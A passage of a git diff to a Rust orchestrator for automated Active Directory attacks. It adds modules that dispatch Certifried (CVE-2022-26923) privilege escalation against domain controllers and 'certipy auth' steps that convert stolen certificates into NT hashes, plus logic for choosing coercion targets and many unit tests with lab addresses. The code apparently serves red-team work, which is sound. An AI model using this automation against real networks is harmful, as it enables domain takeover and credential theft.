assert!(!is_exploitable_esc_type("esc3")); + assert!(!is_exploitable_esc_type("esc5")); + assert!(!is_exploitable_esc_type("esc14")); assert!(!is_exploitable_esc_type("rbcd")); assert!(!is_exploitable_esc_type("shadow_credentials")); assert!(!is_exploitable_esc_type("genericall")); assert!(!is_exploitable_esc_type("")); - assert!(!is_exploitable_esc_type("adcs_esc2")); + assert!(!is_exploitable_esc_type("adcs_esc5")); } // normalize_esc_type @@ -709,6 +1021,11 @@ mod tests { assert_eq!(role_for_esc_type("esc8"), "coercion"); } + #[test] + fn role_for_esc11_is_coercion() { + assert_eq!(role_for_esc_type("esc11"), "coercion"); + } + #[test] fn role_for_esc1_is_privesc() { assert_eq!(role_for_esc_type("esc1"), "privesc"); @@ -719,6 +1036,16 @@ mod tests { assert_eq!(role_for_esc_type("esc4"), "privesc"); } + #[test] + fn role_for_esc10_is_privesc() { + assert_eq!(role_for_esc_type("esc10"), "privesc"); + } + + #[test] + fn role_for_esc15_is_privesc() { + assert_eq!(role_for_esc_type("esc15"), "privesc"); + } + #[test] fn role_for_unknown_defaults_to_privesc() { assert_eq!(role_for_esc_type("esc99"), "privesc"); @@ -830,4 +1157,130 @@ mod tests { ); assert_eq!(extract_account_name(&details), None); } + + // pick_coerce_targets + + fn windows_host(ip: &str, hostname: &str) -> ares_core::models::Host { + ares_core::models::Host { + ip: ip.to_string(), + hostname: hostname.to_string(), + os: "Windows Server 2019".to_string(), + roles: Vec::new(), + services: vec!["microsoft-ds".to_string()], + is_dc: false, + owned: false, + } + } + + fn dc_host(ip: &str, hostname: &str) -> ares_core::models::Host { + ares_core::models::Host { + ip: ip.to_string(), + hostname: hostname.to_string(), + os: "Windows Server 2019".to_string(), + roles: Vec::new(), + services: vec!["microsoft-ds".to_string()], + is_dc: true, + owned: false, + } + } + + fn linux_host(ip: &str) -> ares_core::models::Host { + ares_core::models::Host { + ip: ip.to_string(), + hostname: format!("linux-{ip}"), + os: "Ubuntu 22.04".to_string(), + roles: Vec::new(), + services: vec!["ssh".to_string()], + is_dc: false, + owned: false, + } + } + + #[test] + fn pick_coerce_targets_prefers_vuln_domain_dc() { + let dcs: HashMap = + [("contoso.local".to_string(), "192.168.58.20".to_string())] + .into_iter() + .collect(); + let out = pick_coerce_targets(Some("192.168.58.10"), Some("192.168.58.20"), &dcs, &[]); + assert_eq!(out, vec!["192.168.58.20".to_string()]); + } + + #[test] + fn pick_coerce_targets_excludes_ca_host() { + let dcs: HashMap = + [("contoso.local".to_string(), "192.168.58.10".to_string())] + .into_iter() + .collect(); + let out = pick_coerce_targets( + Some("192.168.58.10"), + Some("192.168.58.10"), + &dcs, + &[windows_host("192.168.58.10", "ca-and-dc")], + ); + assert!(out.is_empty(), "CA host must not appear: {out:?}"); + } + + #[test] + fn pick_coerce_targets_falls_back_to_member_servers() { + let dcs: HashMap = + [("contoso.local".to_string(), "192.168.58.10".to_string())] + .into_iter() + .collect(); + let hosts = vec![ + dc_host("192.168.58.10", "dc01"), + windows_host("192.168.58.51", "ws01"), + linux_host("192.168.58.99"), + ]; + let out = pick_coerce_targets(Some("192.168.58.10"), Some("192.168.58.10"), &dcs, &hosts); + // CA excluded; only Windows non-DC member server remains. + assert_eq!(out, vec!["192.168.58.51".to_string()]); + } + + #[test] + fn pick_coerce_targets_orders_dc_then_other_dcs_then_members() { + let dcs: HashMap = [ + ("contoso.local".to_string(), "192.168.58.20".to_string()), + ("fabrikam.local".to_string(), "192.168.58.30".to_string()), + ] + .into_iter() + .collect(); + let hosts = vec![windows_host("192.168.58.51", "ws01")]; + let out = pick_coerce_targets(Some("192.168.58.10"), Some("192.168.58.20"), &dcs, &hosts); + // Tier 1 (vuln-domain DC) first. + assert_eq!(out[0], "192.168.58.20"); + // Tier 2 (other DC) and Tier 3 (member) both present, no CA. + assert!(out.contains(&"192.168.58.30".to_string())); + assert!(out.contains(&"192.168.58.51".to_string())); + assert!(!out.contains(&"192.168.58.10".to_string())); + } + + #[test] + fn pick_coerce_targets_dedups_dc_appearing_in_hosts_list() { + let dcs: HashMap = + [("contoso.local".to_string(), "192.168.58.20".to_string())] + .into_iter() + .collect(); + let hosts = vec![dc_host("192.168.58.20", "dc01")]; + let out = pick_coerce_targets(Some("192.168.58.10"), Some("192.168.58.20"), &dcs, &hosts); + assert_eq!(out, vec!["192.168.58.20".to_string()]); + } + + #[test] + fn pick_coerce_targets_ca_match_is_case_insensitive() { + let dcs: HashMap = HashMap::new(); + let hosts = vec![windows_host("DC01.contoso.local", "dc01")]; + let out = pick_coerce_targets(Some("dc01.contoso.local"), None, &dcs, &hosts); + assert!( + out.is_empty(), + "CA hostname (case-mismatched) must be excluded" + ); + } + + #[test] + fn pick_coerce_targets_empty_when_no_inputs() { + let dcs: HashMap = HashMap::new(); + let out = pick_coerce_targets(Some("192.168.58.10"), None, &dcs, &[]); + assert!(out.is_empty()); + } } diff --git a/ares-cli/src/orchestrator/automation/bloodhound.rs b/ares-cli/src/orchestrator/automation/bloodhound.rs index 8b805cea..f2c1342c 100644 --- a/ares-cli/src/orchestrator/automation/bloodhound.rs +++ b/ares-cli/src/orchestrator/automation/bloodhound.rs @@ -40,7 +40,7 @@ pub async fn auto_bloodhound(dispatcher: Arc, mut shutdown: watch::R .iter() .filter(|d| !state.is_processed(DEDUP_BLOODHOUND_DOMAINS, d)) .filter_map(|domain| { - let dc_ip = state.domain_controllers.get(domain).cloned()?; + let dc_ip = state.resolve_dc_ip(domain)?; // Select best credential for this specific domain let cred = find_domain_credential( domain, diff --git a/ares-cli/src/orchestrator/automation/certifried.rs b/ares-cli/src/orchestrator/automation/certifried.rs new file mode 100644 index 00000000..ed15806d --- /dev/null +++ b/ares-cli/src/orchestrator/automation/certifried.rs @@ -0,0 +1,485 @@ +//! auto_certifried -- CVE-2022-26923 machine account DNS hostname spoofing. +//! +//! Certifried abuses the fact that machine accounts can enroll for certificates +//! and the DNS hostname in the certificate is derived from the machine account's +//! dNSHostName attribute. By creating a machine account and setting its +//! dNSHostName to a DC's hostname, you can obtain a certificate that +//! authenticates as the DC. +//! +//! Prerequisites: +//! - MachineAccountQuota > 0 (default 10) +//! - Valid domain credential +//! - ADCS CA discovered +//! +//! Dispatches to "privesc" role with technique "certifried". + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Collect certifried work items from current state. +/// +/// Pure logic extracted from `auto_certifried` so it can be unit-tested +/// without needing a `Dispatcher` or async runtime. +fn collect_certifried_work(state: &StateInner) -> Vec { + if state.credentials.is_empty() { + return Vec::new(); + } + + let mut items = Vec::new(); + + for (domain, dc_ip) in &state.all_domains_with_dcs() { + let dedup_key = format!("certifried:{}", domain.to_lowercase()); + if state.is_processed(DEDUP_CERTIFRIED, &dedup_key) { + continue; + } + + // Find the DC host to get its hostname for spoofing + let dc_hostname = state + .hosts + .iter() + .find(|h| h.ip == *dc_ip && h.is_dc) + .map(|h| h.hostname.clone()) + .filter(|h| !h.is_empty()); + + // Certifried creates a machine account in the TARGET domain via MAQ. + // Cross-forest credentials cannot create machine accounts in a foreign + // forest, so require a credential whose domain matches the target. + let cred = match state.credentials.iter().find(|c| { + c.domain.to_lowercase() == domain.to_lowercase() + && !c.password.is_empty() + && !state.is_credential_quarantined(&c.username, &c.domain) + }) { + Some(c) => c.clone(), + None => continue, + }; + + items.push(CertifriedWork { + dedup_key, + domain: domain.clone(), + dc_ip: dc_ip.clone(), + dc_hostname, + credential: cred, + }); + } + + items +} + +/// Dispatches certifried (CVE-2022-26923) per domain with ADCS. +/// Interval: 45s. +pub async fn auto_certifried(dispatcher: Arc, mut shutdown: watch::Receiver) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("certifried") { + continue; + } + + let work = { + let state = dispatcher.state.read().await; + collect_certifried_work(&state) + }; + + for item in work { + let payload = json!({ + "technique": "certifried", + "cve": "CVE-2022-26923", + "target_ip": item.dc_ip, + "domain": item.domain, + "dc_hostname": item.dc_hostname, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + }); + + let priority = dispatcher.effective_priority("certifried"); + match dispatcher + .throttled_submit("exploit", "privesc", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + domain = %item.domain, + dc = %item.dc_ip, + "Certifried (CVE-2022-26923) dispatched" + ); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_CERTIFRIED, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_CERTIFRIED, &item.dedup_key) + .await; + } + Ok(None) => { + debug!(domain = %item.domain, "Certifried deferred"); + } + Err(e) => { + warn!(err = %e, domain = %item.domain, "Failed to dispatch certifried"); + } + } + } + } +} + +struct CertifriedWork { + dedup_key: String, + domain: String, + dc_ip: String, + dc_hostname: Option, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + use ares_core::models::{Credential, Host}; + + fn make_credential(username: &str, password: &str, domain: &str) -> Credential { + Credential { + id: format!("c-{username}"), + username: username.into(), + password: password.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + fn make_host(ip: &str, hostname: &str, is_dc: bool) -> Host { + Host { + ip: ip.into(), + hostname: hostname.into(), + os: String::new(), + roles: Vec::new(), + services: Vec::new(), + is_dc, + owned: false, + } + } + + // --- collect_certifried_work tests --- + + #[test] + fn collect_empty_state_returns_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_certifried_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let work = collect_certifried_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_single_domain_produces_work() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_certifried_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dc_ip, "192.168.58.10"); + assert_eq!(work[0].dedup_key, "certifried:contoso.local"); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_dedup_skips_already_processed() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.mark_processed(DEDUP_CERTIFRIED, "certifried:contoso.local".into()); + let work = collect_certifried_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_multiple_domains() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("svcacct", "Svc!Pass1", "fabrikam.local")); // pragma: allowlist secret + let work = collect_certifried_work(&state); + assert_eq!(work.len(), 2); + let domains: Vec<&str> = work.iter().map(|w| w.domain.as_str()).collect(); + assert!(domains.contains(&"contoso.local")); + assert!(domains.contains(&"fabrikam.local")); + } + + #[test] + fn collect_dc_hostname_resolved_from_hosts() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .hosts + .push(make_host("192.168.58.10", "dc01.contoso.local", true)); + let work = collect_certifried_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dc_hostname, Some("dc01.contoso.local".into())); + } + + #[test] + fn collect_dc_hostname_none_when_no_host_match() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_certifried_work(&state); + assert_eq!(work.len(), 1); + assert!(work[0].dc_hostname.is_none()); + } + + #[test] + fn collect_prefers_same_domain_credential() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("crossuser", "Cross!1", "fabrikam.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_certifried_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_skips_when_only_cross_forest_credential() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("crossuser", "Cross!1", "fabrikam.local")); // pragma: allowlist secret + // Certifried needs a target-domain credential to create a machine + // account in the target forest; cross-forest creds cannot do this. + let work = collect_certifried_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_skips_empty_password_credentials() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "", "contoso.local")); + let work = collect_certifried_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_quarantined_credential_skipped() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("baduser", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.quarantine_credential("baduser", "contoso.local"); + let work = collect_certifried_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_dedup_key_lowercased() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("CONTOSO.LOCAL".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_certifried_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dedup_key, "certifried:contoso.local"); + } + + #[test] + fn dedup_key_format() { + let key = format!("certifried:{}", "contoso.local"); + assert_eq!(key, "certifried:contoso.local"); + } + + #[test] + fn dedup_key_normalizes_domain() { + let key = format!("certifried:{}", "CONTOSO.LOCAL".to_lowercase()); + assert_eq!(key, "certifried:contoso.local"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_CERTIFRIED, "certifried"); + } + + #[test] + fn dc_hostname_from_hosts() { + // Simulates finding a DC hostname from hosts list + let hostname = "dc01.contoso.local"; + let filtered = Some(hostname.to_string()).filter(|h| !h.is_empty()); + assert_eq!(filtered, Some("dc01.contoso.local".to_string())); + + let empty = Some("".to_string()).filter(|h| !h.is_empty()); + assert!(empty.is_none()); + } + + #[test] + fn payload_structure_has_correct_technique() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let payload = serde_json::json!({ + "technique": "certifried", + "cve": "CVE-2022-26923", + "target_ip": "192.168.58.10", + "domain": "contoso.local", + "dc_hostname": "dc01.contoso.local", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + assert_eq!(payload["technique"], "certifried"); + assert_eq!(payload["cve"], "CVE-2022-26923"); + assert_eq!(payload["target_ip"], "192.168.58.10"); + assert_eq!(payload["dc_hostname"], "dc01.contoso.local"); + } + + #[test] + fn payload_without_dc_hostname() { + let payload = serde_json::json!({ + "technique": "certifried", + "cve": "CVE-2022-26923", + "target_ip": "192.168.58.10", + "domain": "contoso.local", + "dc_hostname": null, + "credential": { + "username": "admin", + "password": "P@ssw0rd!", + "domain": "contoso.local", + }, + }); + assert!(payload["dc_hostname"].is_null()); + } + + #[test] + fn work_struct_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let work = CertifriedWork { + dedup_key: "certifried:contoso.local".into(), + domain: "contoso.local".into(), + dc_ip: "192.168.58.10".into(), + dc_hostname: Some("dc01.contoso.local".into()), + credential: cred, + }; + assert_eq!(work.domain, "contoso.local"); + assert_eq!(work.dc_ip, "192.168.58.10"); + assert_eq!(work.dc_hostname, Some("dc01.contoso.local".into())); + assert_eq!(work.credential.username, "admin"); + } + + #[test] + fn work_struct_without_hostname() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let work = CertifriedWork { + dedup_key: "certifried:contoso.local".into(), + domain: "contoso.local".into(), + dc_ip: "192.168.58.10".into(), + dc_hostname: None, + credential: cred, + }; + assert!(work.dc_hostname.is_none()); + } +} diff --git a/ares-cli/src/orchestrator/automation/certipy_auth.rs b/ares-cli/src/orchestrator/automation/certipy_auth.rs new file mode 100644 index 00000000..af498b33 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/certipy_auth.rs @@ -0,0 +1,749 @@ +//! auto_certipy_auth -- authenticate using obtained certificates. +//! +//! After ADCS exploitation (ESC1/ESC4/ESC8) obtains a certificate (.pfx), +//! this automation dispatches `certipy auth` to convert the certificate +//! into an NT hash, enabling pass-the-hash for the impersonated user. +//! +//! Watches for `certificate_obtained` vulnerability type in discovered_vulnerabilities +//! which is registered by the ADCS exploitation result processor. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Authenticates with obtained certificates to extract NT hashes. +/// Interval: 30s. +pub async fn auto_certipy_auth(dispatcher: Arc, mut shutdown: watch::Receiver) { + let mut interval = tokio::time::interval(Duration::from_secs(30)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("certipy_auth") { + continue; + } + + let work: Vec = { + let state = dispatcher.state.read().await; + collect_cert_auth_work(&state) + }; + + for item in work { + let mut payload = json!({ + "technique": "certipy_auth", + "vuln_id": item.vuln_id, + "pfx_path": item.pfx_path, + "domain": item.domain, + "target_user": item.target_user, + }); + + if let Some(ref dc) = item.dc_ip { + payload["target_ip"] = json!(dc); + payload["dc_ip"] = json!(dc); + } + + let priority = dispatcher.effective_priority("certipy_auth"); + match dispatcher + .throttled_submit("credential_access", "credential_access", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + vuln_id = %item.vuln_id, + user = %item.target_user, + "Certificate authentication dispatched" + ); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_CERTIPY_AUTH, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_CERTIPY_AUTH, &item.dedup_key) + .await; + } + Ok(None) => { + debug!(vuln_id = %item.vuln_id, "Certificate auth deferred"); + } + Err(e) => { + warn!(err = %e, vuln_id = %item.vuln_id, "Failed to dispatch cert auth"); + } + } + } + } +} + +/// Pure logic extracted from `auto_certipy_auth` so it can be unit-tested without +/// needing a `Dispatcher` or async runtime (beyond state construction). +fn collect_cert_auth_work(state: &crate::orchestrator::state::StateInner) -> Vec { + state + .discovered_vulnerabilities + .values() + .filter_map(|vuln| { + let vtype = vuln.vuln_type.to_lowercase(); + if vtype != "certificate_obtained" && vtype != "adcs_certificate" { + return None; + } + + if state.exploited_vulnerabilities.contains(&vuln.vuln_id) { + return None; + } + + let dedup_key = format!("cert_auth:{}", vuln.vuln_id); + if state.is_processed(DEDUP_CERTIPY_AUTH, &dedup_key) { + return None; + } + + let pfx_path = vuln + .details + .get("pfx_path") + .or_else(|| vuln.details.get("certificate_path")) + .or_else(|| vuln.details.get("cert_file")) + .and_then(|v| v.as_str()) + .map(|s| s.to_string())?; + + let domain = vuln + .details + .get("domain") + .and_then(|v| v.as_str()) + .unwrap_or("") + .to_string(); + + let target_user = vuln + .details + .get("target_user") + .or_else(|| vuln.details.get("upn")) + .or_else(|| vuln.details.get("account_name")) + .and_then(|v| v.as_str()) + .unwrap_or("administrator") + .to_string(); + + let dc_ip = state + .domain_controllers + .get(&domain.to_lowercase()) + .cloned(); + + Some(CertAuthWork { + vuln_id: vuln.vuln_id.clone(), + dedup_key, + pfx_path, + domain, + target_user, + dc_ip, + }) + }) + .collect() +} + +struct CertAuthWork { + vuln_id: String, + dedup_key: String, + pfx_path: String, + domain: String, + target_user: String, + dc_ip: Option, +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn dedup_key_format() { + let key = format!("cert_auth:{}", "vuln-cert-001"); + assert_eq!(key, "cert_auth:vuln-cert-001"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_CERTIPY_AUTH, "certipy_auth"); + } + + #[test] + fn cert_vuln_types_accepted() { + let types = [ + "certificate_obtained", + "adcs_certificate", + "CERTIFICATE_OBTAINED", + ]; + for t in &types { + let lower = t.to_lowercase(); + assert!( + lower == "certificate_obtained" || lower == "adcs_certificate", + "{t} should match" + ); + } + } + + #[test] + fn non_cert_vuln_types_rejected() { + let non_cert = ["esc1", "smb_signing_disabled", "mssql_access"]; + for t in &non_cert { + let lower = t.to_lowercase(); + assert!(lower != "certificate_obtained" && lower != "adcs_certificate"); + } + } + + #[test] + fn pfx_path_fallback_chain() { + // Primary key + let details = serde_json::json!({"pfx_path": "/tmp/cert.pfx"}); + let path = details + .get("pfx_path") + .or_else(|| details.get("certificate_path")) + .or_else(|| details.get("cert_file")) + .and_then(|v| v.as_str()); + assert_eq!(path, Some("/tmp/cert.pfx")); + + // Fallback to certificate_path + let details2 = serde_json::json!({"certificate_path": "/tmp/alt.pfx"}); + let path2 = details2 + .get("pfx_path") + .or_else(|| details2.get("certificate_path")) + .or_else(|| details2.get("cert_file")) + .and_then(|v| v.as_str()); + assert_eq!(path2, Some("/tmp/alt.pfx")); + + // Fallback to cert_file + let details3 = serde_json::json!({"cert_file": "/tmp/other.pfx"}); + let path3 = details3 + .get("pfx_path") + .or_else(|| details3.get("certificate_path")) + .or_else(|| details3.get("cert_file")) + .and_then(|v| v.as_str()); + assert_eq!(path3, Some("/tmp/other.pfx")); + + // No key returns None + let details4 = serde_json::json!({}); + let path4 = details4 + .get("pfx_path") + .or_else(|| details4.get("certificate_path")) + .or_else(|| details4.get("cert_file")) + .and_then(|v| v.as_str()); + assert!(path4.is_none()); + } + + #[test] + fn target_user_fallback() { + let details = serde_json::json!({"target_user": "admin"}); + let user = details + .get("target_user") + .or_else(|| details.get("upn")) + .or_else(|| details.get("account_name")) + .and_then(|v| v.as_str()) + .unwrap_or("administrator"); + assert_eq!(user, "admin"); + + // Falls back to "administrator" when no key present + let details2 = serde_json::json!({}); + let user2 = details2 + .get("target_user") + .or_else(|| details2.get("upn")) + .or_else(|| details2.get("account_name")) + .and_then(|v| v.as_str()) + .unwrap_or("administrator"); + assert_eq!(user2, "administrator"); + } + + #[test] + fn cert_auth_payload_structure() { + let payload = serde_json::json!({ + "technique": "certipy_auth", + "vuln_id": "cert-001", + "pfx_path": "/tmp/cert.pfx", + "domain": "contoso.local", + "target_user": "administrator", + }); + assert_eq!(payload["technique"], "certipy_auth"); + assert_eq!(payload["pfx_path"], "/tmp/cert.pfx"); + assert_eq!(payload["target_user"], "administrator"); + } + + #[test] + fn cert_auth_payload_with_dc() { + let mut payload = serde_json::json!({ + "technique": "certipy_auth", + "vuln_id": "cert-001", + "pfx_path": "/tmp/cert.pfx", + "domain": "contoso.local", + "target_user": "administrator", + }); + let dc_ip = Some("192.168.58.10".to_string()); + if let Some(ref dc) = dc_ip { + payload["target_ip"] = serde_json::json!(dc); + payload["dc_ip"] = serde_json::json!(dc); + } + assert_eq!(payload["target_ip"], "192.168.58.10"); + assert_eq!(payload["dc_ip"], "192.168.58.10"); + } + + #[test] + fn cert_auth_payload_without_dc() { + let payload = serde_json::json!({ + "technique": "certipy_auth", + "vuln_id": "cert-001", + "pfx_path": "/tmp/cert.pfx", + "domain": "contoso.local", + "target_user": "administrator", + }); + assert!(payload.get("target_ip").is_none()); + assert!(payload.get("dc_ip").is_none()); + } + + #[test] + fn target_user_upn_fallback() { + let details = serde_json::json!({"upn": "admin@contoso.local"}); + let user = details + .get("target_user") + .or_else(|| details.get("upn")) + .or_else(|| details.get("account_name")) + .and_then(|v| v.as_str()) + .unwrap_or("administrator"); + assert_eq!(user, "admin@contoso.local"); + } + + #[test] + fn target_user_account_name_fallback() { + let details = serde_json::json!({"account_name": "svc_sql"}); + let user = details + .get("target_user") + .or_else(|| details.get("upn")) + .or_else(|| details.get("account_name")) + .and_then(|v| v.as_str()) + .unwrap_or("administrator"); + assert_eq!(user, "svc_sql"); + } + + #[test] + fn cert_auth_work_construction() { + let work = CertAuthWork { + vuln_id: "cert-001".into(), + dedup_key: "cert_auth:cert-001".into(), + pfx_path: "/tmp/cert.pfx".into(), + domain: "contoso.local".into(), + target_user: "administrator".into(), + dc_ip: Some("192.168.58.10".into()), + }; + assert_eq!(work.vuln_id, "cert-001"); + assert_eq!(work.dc_ip, Some("192.168.58.10".into())); + } + + #[test] + fn cert_auth_work_no_dc() { + let work = CertAuthWork { + vuln_id: "cert-002".into(), + dedup_key: "cert_auth:cert-002".into(), + pfx_path: "/tmp/cert2.pfx".into(), + domain: "fabrikam.local".into(), + target_user: "admin".into(), + dc_ip: None, + }; + assert!(work.dc_ip.is_none()); + } + + // -- Tests exercising the extracted `collect_cert_auth_work` function -- + + use crate::orchestrator::state::SharedState; + + fn make_vuln( + vuln_id: &str, + vuln_type: &str, + details: std::collections::HashMap, + ) -> ares_core::models::VulnerabilityInfo { + ares_core::models::VulnerabilityInfo { + vuln_id: vuln_id.into(), + vuln_type: vuln_type.into(), + target: "192.168.58.10".into(), + discovered_by: "test".into(), + discovered_at: chrono::Utc::now(), + details, + recommended_agent: String::new(), + priority: 5, + } + } + + #[tokio::test] + async fn collect_empty_state_returns_no_work() { + let shared = SharedState::new("test".into()); + let state = shared.read().await; + let work = collect_cert_auth_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_certificate_obtained_vuln_produces_work() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + let mut details = std::collections::HashMap::new(); + details.insert("pfx_path".into(), serde_json::json!("/tmp/admin.pfx")); + details.insert("domain".into(), serde_json::json!("contoso.local")); + details.insert("target_user".into(), serde_json::json!("administrator")); + s.discovered_vulnerabilities.insert( + "cert-001".into(), + make_vuln("cert-001", "certificate_obtained", details), + ); + } + let state = shared.read().await; + let work = collect_cert_auth_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].vuln_id, "cert-001"); + assert_eq!(work[0].pfx_path, "/tmp/admin.pfx"); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].target_user, "administrator"); + assert_eq!(work[0].dedup_key, "cert_auth:cert-001"); + assert!(work[0].dc_ip.is_none()); + } + + #[tokio::test] + async fn collect_adcs_certificate_vuln_produces_work() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + let mut details = std::collections::HashMap::new(); + details.insert("pfx_path".into(), serde_json::json!("/tmp/svc.pfx")); + details.insert("domain".into(), serde_json::json!("fabrikam.local")); + details.insert("target_user".into(), serde_json::json!("svc_sql")); + s.discovered_vulnerabilities.insert( + "cert-002".into(), + make_vuln("cert-002", "adcs_certificate", details), + ); + } + let state = shared.read().await; + let work = collect_cert_auth_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].vuln_id, "cert-002"); + assert_eq!(work[0].domain, "fabrikam.local"); + assert_eq!(work[0].target_user, "svc_sql"); + } + + #[tokio::test] + async fn collect_ignores_non_cert_vuln_types() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + let mut details = std::collections::HashMap::new(); + details.insert("pfx_path".into(), serde_json::json!("/tmp/cert.pfx")); + s.discovered_vulnerabilities + .insert("vuln-esc1".into(), make_vuln("vuln-esc1", "esc1", details)); + } + let state = shared.read().await; + let work = collect_cert_auth_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_skips_exploited_vulnerabilities() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + let mut details = std::collections::HashMap::new(); + details.insert("pfx_path".into(), serde_json::json!("/tmp/cert.pfx")); + details.insert("domain".into(), serde_json::json!("contoso.local")); + s.discovered_vulnerabilities.insert( + "cert-010".into(), + make_vuln("cert-010", "certificate_obtained", details), + ); + s.exploited_vulnerabilities.insert("cert-010".into()); + } + let state = shared.read().await; + let work = collect_cert_auth_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_skips_already_deduped() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + let mut details = std::collections::HashMap::new(); + details.insert("pfx_path".into(), serde_json::json!("/tmp/cert.pfx")); + details.insert("domain".into(), 